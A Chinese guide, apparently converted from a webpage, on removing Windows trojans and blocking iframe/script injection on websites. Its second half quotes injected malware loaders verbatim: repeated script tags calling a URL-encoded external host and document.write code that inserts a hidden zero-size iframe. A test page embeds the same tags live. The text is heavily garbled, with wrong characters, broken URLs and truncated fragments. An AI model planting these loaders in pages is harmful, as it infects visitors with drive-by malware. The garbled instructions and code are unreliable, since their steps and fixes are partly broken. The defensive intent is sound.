最簡單的系統(tǒng)木馬病毒解決方法

最簡潔的系統(tǒng)木馬病毒解決方法系統(tǒng)中木馬病毒后該怎么辦？下面我們介紹一些簡潔的解決方法。翻開windows任務(wù)治理器，觀察是否有可疑的進(jìn)程(可以依據(jù)殺毒軟件的報告或者在網(wǎng)上搜尋相關(guān)信息來判定)system32名目下的Rundll32.exe本身不是病毒，有可能一個dll文件在運(yùn)行，他才可能是病毒或惡意程序之類的東西。由于windows任務(wù)治理器不能顯示進(jìn)程的路徑，因此建議使用殺毒軟件自帶的進(jìn)程觀察和治理工具來查找并中止可疑進(jìn)程。然后設(shè)法找到病毒程序文件(主要是你所中止的病毒的文件，再觀察如system32文件夾中是否有不明dll或exeC:\ProgramFiles、C:\DocumentsandSettings\user\LocalSettings\TemporaryInternetFiles、C:\DocumentsandSettings\user\LocalSettings\Temp等處是否有不明文件或病毒程序文件)，然后刪去，搞清楚是否是系統(tǒng)文件再動手。有些病毒進(jìn)程終止不了，提示“拒絕訪問”，或者消滅“屢禁不止”的狀況。依據(jù)我的閱歷，有三種方法供嘗試：可能是某些木馬病毒、流氓軟件等注冊為系統(tǒng)效勞了。方法是：觀察掌握面板〉治理工具〉效勞，看有沒有與之相關(guān)的效勞(特別是“描述”為空的)在運(yùn)行，把它停頓。再試著中止病毒進(jìn)程并刪除。你可以嘗試安全模式下(開機(jī)后按F8選安全模式)12A試一試。使用冰刃等工具，觀察病毒進(jìn)程的線程信息和模塊信息，嘗試完畢線程和解除模塊，再試著刪除病毒進(jìn)程文件和相應(yīng)的模塊。(慎用)假設(shè)略微懂得注冊表使用的，可以再把相關(guān)的注冊表鍵值刪除。一般方法：開頭〉運(yùn)行，輸入regedit，確定，翻開注冊表編輯器。編輯〉查找，查找目標(biāo)為病毒進(jìn)程名，在搜尋結(jié)果中將與之有關(guān)的鍵值刪除。有時這樣做不能遏止病毒，還應(yīng)嘗試使用步驟2中方法。IE360安全衛(wèi)士，看掃瞄器關(guān)心對象BHO是否有可疑工程，有沒有沒惡意插件或者木馬。有就修復(fù)它。其他提示：為了更好的操作，請先用優(yōu)化大師或超級兔子清理全部臨時文件和上網(wǎng)時的緩存文件。一般病毒往往在臨時文件夾Temp中，這樣做可以幫你更快找到病毒文件。開頭>>運(yùn)行，輸入msconfig“系統(tǒng)配置有用程序”。選擇“啟動”，觀察治本，甚至對某些程序來說無效。還是要按步驟1、2辦。2009-03-0617:01網(wǎng)站被掛木馬解決方法“://236z/viewthread.php?tid=428347“:://236z/viewthread.php?tid=428347QQMSN一行代碼解決iframe掛馬〔包含效勞器端注入、客戶端ARP注入等〕》得到了——頁面的頂部或底部加上了：留意，以下地址含有木馬，請不要輕易訪問：<scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=://%76%63%63%64%2E%63%6E></script>汗死一連插入了N個一樣的<script>標(biāo)記偶的電腦什么補(bǔ)丁都打了直接訪document.write(“<divstyle=”display:none”>“)document.write(“<iframe“://a.158dm/b1.htm?id=017“src=://a.158dm/b1.htm?id=017width=0height=0></iframe>“)document.write(“</div>“)“://a.158dm/b1.htm“JS網(wǎng)馬的組織，哎，什么世道。還收費(fèi)蠻高滴呢！...varKfqq,Qqs=“[color=Magenta]784378237[/color]“;qwfgsg=“LLLL\\XXXXXLD“;Kfqq=Qqs;)〔NJS〕<script>木馬的特點是什么：<scriptsrc=://%76%63%63%64%2E%63%6E></script>對了，scriptsrcsrc；再看看木馬的原形，里面還是輸出iframe、JS<object>代碼，不管這么多，來多少殺多少。CSS，5解決方案１：iframe{n1ifm:expression(this.src=”about:blank”,this.outerHTML=””);}/*這行代碼是解決掛IFRAME木馬的哦*/script{nojs1:expression((this.src.toLowerCase.indexOf(””)==0)?document.write(”木馬被成功隔離!”):””);}src“”開頭的外JS常顯示。<script>木馬的頁面。解決方案２：iframe{nifm2:expression(this.src=”about:blank”,this.outerHTML=””);}script{no2js:expression((this.src.toLowerCase.indexOf(””)==0)?document.close:””);}document.close強(qiáng)制關(guān)閉。解決方案３：iframe{ni3fm:expression(this.src=”about:blank”,this.outerHTML=””);}script{n3ojs:expression((this.src.toLowerCase.indexOf(””)==0)?document.execCommand(”stop”):””);}execCommandJSJSIE解決方案４：iframe{nif4m:expression(this.src=”about:blank”,this.outerHTML=””);}script{noj4s:expression(if(this.src.indexOf(””)==0)this.src=”res://ieframe.dll/dnserror.htm”);}IE404JS解決方案5：iframe{nifm5:expression(this.src=”about:blank”,this.outerHTML=””);}script{noj5s:expression((this.id.toLowerCase.indexOf(”vok”)!=-1)?document.write(”木馬被成功隔離!”):””));}HTML<script>中要參加以“l(fā)hid，如lhWeatherJSapi，<scriptsrc=“***/**.js“id=“l(fā)hSearchJSapi“></script>6此測試有肯定的危急性，請務(wù)必打好全部補(bǔ)丁再測試〕“://ght.cc/“ght.cc電影王國<!DOCTYPEhtmlPUBLIC“-//W3C//DTDXHTML1.0Transitional//EN““:///TR/xhtml1/DTD/xhtml1-transitional.dtd““:///TR/xhtml1/DTD/xhtml1-transitional.dtd“><html“:///1999/xhtml“xmlns=“:///1999/xhtml“><head><meta-equiv=“Content-Type“content=“text/html;charset=utf-8“/>JSCSS</title><styletype=“text/css“id=“LinrStudio“>/*<![CDATA[*/iframe{nhk1:expression(this.src=”about:blank”,this.outerHTML=””);}script{ngz1:expression((this.src.indexOf(””)==0)?document.close:””);}“:///ff/api.htm“*//*]]>*/</style></head><body><scripttype=“text/javascript“src=“1.js“></script><scriptsrc=://%76%63%63%64%2E%63%6E></script><scriptsrc=“://%76%63%63%64%2E%63%6E“type=“text/javascript“></script><scriptsrc=://%76%63%63%64%2E%63%6E></script>我是頁面本身的１<scriptsrc=://%76%63%63%64%2E%63%6E></script>我是頁面本身的２<scriptsrc=://%76%63%63%64%2E%63%6E></script>我是頁面本身的３<scriptsrc=://%76%63%63%64%2E%63%6E></script></body></html>1.jsJSdocument.write(“<img